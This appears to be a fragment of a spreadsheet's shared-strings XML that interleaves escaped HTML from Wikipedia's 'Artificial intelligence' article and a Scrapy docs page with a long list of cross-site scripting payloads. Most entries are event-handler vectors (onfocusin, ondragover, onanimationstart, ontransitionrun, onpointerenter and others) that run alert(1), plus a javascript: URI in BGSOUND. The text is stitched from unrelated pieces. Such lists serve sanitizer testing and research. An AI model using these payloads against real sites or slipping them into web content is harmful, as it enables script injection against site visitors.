    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;multicol ondragover=alert(1) contenteditable&gt;drop here&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The simplest AI applications can be divided into two types: classifiers ("if shiny then diamond") and controllers ("if shiny then pick up"). Controllers do, however, also classify conditions before inferring actions, and therefore classification forms a central part of many AI systems. &lt;a href="/wiki/Classifier_(mathematics)" class="mw-redirect" title="Classifier (mathematics)"&gt;Classifiers &lt;/a&gt; are functions that use &lt;a href="/wiki/Pattern_matching" title="Pattern matching"&gt;pattern matching &lt;/a&gt; to determine a closest match. They can be tuned according to examples, making them very attractive for use in AI. These examples are known as observations or patterns. In supervised learning, each pattern belongs to a certain predefined class. A class can be seen as a decision that has to be made. All the observations combined with their class labels are known as a data set. When a new observation is received, that observation is classified based on previous experience.&lt;sup id="cite_ref-Classifiers_216-0" class="reference"&gt;&lt;a href="#cite_note-Classifiers-216"&gt;&amp;#91;210&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;input autofocus onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Laproscopic_Surgery_Robot.jpg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/0/0d/Laproscopic_Surgery_Robot.jpg/220px-Laproscopic_Surgery_Robot.jpg" decoding="async" width="220" height="320" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/0/0d/Laproscopic_Surgery_Robot.jpg/330px-Laproscopic_Surgery_Robot.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/0/0d/Laproscopic_Surgery_Robot.jpg/440px-Laproscopic_Surgery_Robot.jpg 2x" data-file-width="891" data-file-height="1296" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 onactivate=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onmousedown="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">				&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;img oncontextmenu="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerleave=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;base onload=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mental_representation" title="Mental representation"&gt;Representational &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointerover=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;rp onbeforepaste="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerout=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;body onmouseleave="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="navbox-abovebelow" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;BGSOUND SRC="javascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;track onpointerout=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;select onkeypress="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerdown=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      jQuery(function () {</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;Natural language processing &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Bertram_Raphael" title="Bertram Raphael"&gt;Raphael, Bertram &lt;/a&gt; (1976). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/thinkingcomputer00raph"&gt;&lt;i&gt;The Thinking Computer &lt;/i&gt; &lt;/a&gt;. W.H.Freeman and Company. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7167-0723-3" title="Special:BookSources/978-0-7167-0723-3"&gt;&lt;bdi&gt;978-0-7167-0723-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Thinking+Computer&amp;amp;rft.pub=W.H.Freeman+and+Company&amp;amp;rft.date=1976&amp;amp;rft.isbn=978-0-7167-0723-3&amp;amp;rft.aulast=Raphael&amp;amp;rft.aufirst=Bertram&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fthinkingcomputer00raph&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 onactivate=alert(1)&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Software organization &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmouseup="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;main onmouseover="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;span onpointerleave=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;ul&gt;&lt;li id="t-whatlinkshere"&gt;&lt;a href="/wiki/Special:WhatLinksHere/Artificial_intelligence" title="List of all English Wikipedia pages containing links to this page [j]" accesskey="j"&gt;What links here &lt;/a&gt; &lt;/li&gt;&lt;li id="t-recentchangeslinked"&gt;&lt;a href="/wiki/Special:RecentChangesLinked/Artificial_intelligence" rel="nofollow" title="Recent changes in pages linked from this page [k]" accesskey="k"&gt;Related changes &lt;/a&gt; &lt;/li&gt;&lt;li id="t-upload"&gt;&lt;a href="/wiki/Wikipedia:File_Upload_Wizard" title="Upload files [u]" accesskey="u"&gt;Upload file &lt;/a&gt; &lt;/li&gt;&lt;li id="t-specialpages"&gt;&lt;a href="/wiki/Special:SpecialPages" title="A list of all special pages [q]" accesskey="q"&gt;Special pages &lt;/a&gt; &lt;/li&gt;&lt;li id="t-permalink"&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;oldid=945778352" title="Permanent link to this revision of the page"&gt;Permanent link &lt;/a&gt; &lt;/li&gt;&lt;li id="t-info"&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=info" title="More information about this page"&gt;Page information &lt;/a&gt; &lt;/li&gt;&lt;li id="t-wikibase"&gt;&lt;a href="https://www.wikidata.org/wiki/Special:EntityPage/Q11660" title="Link to connected data repository item [g]" accesskey="g"&gt;Wikidata item &lt;/a&gt; &lt;/li&gt;&lt;li id="t-cite"&gt;&lt;a href="/w/index.php?title=Special:CiteThisPage&amp;amp;page=Artificial_intelligence&amp;amp;id=945778352" title="Information on how to cite this page"&gt;Cite this page &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onbeforecut="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseleave="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;noscript draggable="true" ondragend="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;track ondblclick="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/acronym&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionism" title="Evolutionism"&gt;Evolutionism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;base onkeydown="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;img draggable="true" ondrag="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;picture onbeforepaste="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointerup=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;meta onkeypress="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Global_catastrophic_risk#Artificial_intelligence" title="Global catastrophic risk"&gt;Artificial intelligence as a global catastrophic risk &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerenter=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Na%C3%AFve_realism" title="Naïve realism"&gt;Naïve realism &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-FOOTNOTEDomingos2015_152-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015-152"&gt;&amp;#91;149&amp;#93; &lt;/a&gt; &lt;/sup&gt; Finally, a few "emergent" approaches look to simulating human intelligence extremely closely, and believe that &lt;a href="/wiki/Anthropomorphism" title="Anthropomorphism"&gt;anthropomorphic &lt;/a&gt; features like an &lt;a href="/wiki/Artificial_brain" title="Artificial brain"&gt;artificial brain &lt;/a&gt; or simulated &lt;a href="/wiki/Developmental_robotics" title="Developmental robotics"&gt;child development &lt;/a&gt; may someday reach a critical point where general intelligence emerges.&lt;sup id="cite_ref-Brain_simulation_153-0" class="reference"&gt;&lt;a href="#cite_note-Brain_simulation-153"&gt;&amp;#91;150&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;rb onclick="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Classifiers-216"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Classifiers_216-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Frederick, Hayes-Roth; William, Murray; Leonard, Adelman. "Expert systems". &lt;i&gt;AccessScience &lt;/i&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1036%2F1097-8542.248550"&gt;10.1036/1097-8542.248550 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=AccessScience&amp;amp;rft.atitle=Expert+systems&amp;amp;rft_id=info%3Adoi%2F10.1036%2F1097-8542.248550&amp;amp;rft.aulast=Frederick&amp;amp;rft.aufirst=Hayes-Roth&amp;amp;rft.au=William%2C+Murray&amp;amp;rft.au=Leonard%2C+Adelman&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;hgroup onpointerleave=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;select id=x tabindex=1 onactivate=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rb ondrop=alert(1) contenteditable&gt;drop here&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;hr style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;var draggable="true" ondrag="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-236"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-236"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Programming_paradigm" title="Programming paradigm"&gt;Programming paradigm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointerout=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onpointerenter=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;listing style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFDreyfus1972"&gt;Dreyfus 1972 &lt;/a&gt;, &lt;a href="#CITEREFDreyfusDreyfus1986"&gt;Dreyfus &amp;amp; Dreyfus 1986 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink draggable="true" ondragleave="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;select onmouseup="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;b onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/b&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;small onpointerleave=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerenter=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Glossaries_of_science_and_engineering" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerenter=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;object id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;img style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;s id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;dt oncopy="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmousemove="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerdown=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;base onbeforecut="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;big id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;address onbeforepaste="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;shadow id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onkeyup="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointerdown=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/time&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt; or &lt;a class="hoverxref reference internal" data-doc="py-modindex" data-project="scrapy" data-section="" data-version="latest" href="py-modindex.html"&gt;&lt;span class="std std-ref"&gt;Module Index</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=latimes.com&amp;amp;rft.atitle=AlphaGo+beats+human+Go+champ+in+milestone+for+artificial+intelligence&amp;amp;rft.date=2016&amp;amp;rft.aulast=Borowiec&amp;amp;rft.aufirst=Tracey+Lien%2C+Steven&amp;amp;rft_id=https%3A%2F%2Fwww.latimes.com%2Fworld%2Fasia%2Fla-fg-korea-alphago-20160312-story.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tbody ondragover=alert(1) contenteditable&gt;drop here&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Robotics-128"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Robotics_128-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFKoza1992"&gt;Koza 1992 &lt;/a&gt;, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/label&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEKatz2012-178"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEKatz2012_178-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;frameset style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTETaoTan2005-142"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTETaoTan2005_142-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFKurzweil2005"&gt;Kurzweil 2005 &lt;/a&gt;, p.&amp;#160;262 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/b&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerout=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;dd ondblclick="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/First-order_logic" title="First-order logic"&gt;First-order logic &lt;/a&gt; and features such as &lt;a href="/wiki/Equality_(mathematics)" title="Equality (mathematics)"&gt;equality &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;small onclick="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpointerover=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;output onload=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerleave=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Marwala, Tshilidzi; Hurwitz, Evan (2017). &lt;i&gt;Artificial Intelligence and Economic Theory: Skynet in the Market &lt;/i&gt;. London: &lt;a href="/wiki/Springer_Science%2BBusiness_Media" title="Springer Science+Business Media"&gt;Springer &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-3-319-66104-9" title="Special:BookSources/978-3-319-66104-9"&gt;&lt;bdi&gt;978-3-319-66104-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence+and+Economic+Theory%3A+Skynet+in+the+Market&amp;amp;rft.place=London&amp;amp;rft.pub=Springer&amp;amp;rft.date=2017&amp;amp;rft.isbn=978-3-319-66104-9&amp;amp;rft.aulast=Marwala&amp;amp;rft.aufirst=Tshilidzi&amp;amp;rft.au=Hurwitz%2C+Evan&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;thead ondragover=alert(1) contenteditable&gt;drop here&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;button draggable="true" ondragleave="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;header onload=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;img onloadstart=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Logic" title="Logic"&gt;Logic &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption onblur=alert(1) tabindex=1 id=x&gt;&lt;/caption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://social.techcrunch.com/2019/05/03/china-smart-city-exposed/"&gt;"Security lapse exposed a Chinese smart city surveillance system" &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Security+lapse+exposed+a+Chinese+smart+city+surveillance+system&amp;amp;rft_id=http%3A%2F%2Fsocial.techcrunch.com%2F2019%2F05%2F03%2Fchina-smart-city-exposed%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;pre onbeforecut="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onmouseenter="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.bbc.com/news/technology-41845878"&gt;"Single pixel change fools AI programs" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. 3 November 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;12 March </t>
  </si>
  <si>
    <t>&lt;html onpointerover=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointerenter=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onpointerout=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFClark2015" class="citation web"&gt;Clark, Jack (8 December 2015). &lt;a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2015-12-08/why-2015-was-a-breakthrough-year-in-artificial-intelligence"&gt;"Why 2015 Was a Breakthrough Year in Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;Bloomberg News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20161123053855/https://www.bloomberg.com/news/articles/2015-12-08/why-2015-was-a-breakthrough-year-in-artificial-intelligence"&gt;Archived &lt;/a&gt; from the original on 23 November 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 November </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Interaction_design" title="Interaction design"&gt;Interaction design &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dt id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;p draggable="true" ondrag="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/w/index.php?title=Steven_Horst&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Steven Horst (page does not exist)"&gt;Horst, Steven &lt;/a&gt;, (2005) &lt;a rel="nofollow" class="external text" href="http://plato.stanford.edu/entries/computational-mind/"&gt;"The Computational Theory of Mind" &lt;/a&gt; in &lt;i&gt;The Stanford Encyclopedia of Philosophy &lt;/i&gt; </t>
  </si>
  <si>
    <t>&lt;blink onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/blink&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;georgetown.edu &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=georgetown.edu&amp;amp;rft.atitle=Artificial+Intelligence%3A+An+Introduction%2C+p.+37&amp;amp;rft.aulast=Maloof&amp;amp;rft.aufirst=Mark&amp;amp;rft_id=http%3A%2F%2Fpeople.cs.georgetown.edu%2F~maloof%2Fcosc270.f17%2Fcosc270-intro-handout.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;frame id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;fieldset ondragover=alert(1) contenteditable&gt;drop here&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;strike onpointerdown=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;Intelligent agent paradigm &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;LINK REL="stylesheet" HREF="http://.rocks/.css"&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpointerover=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
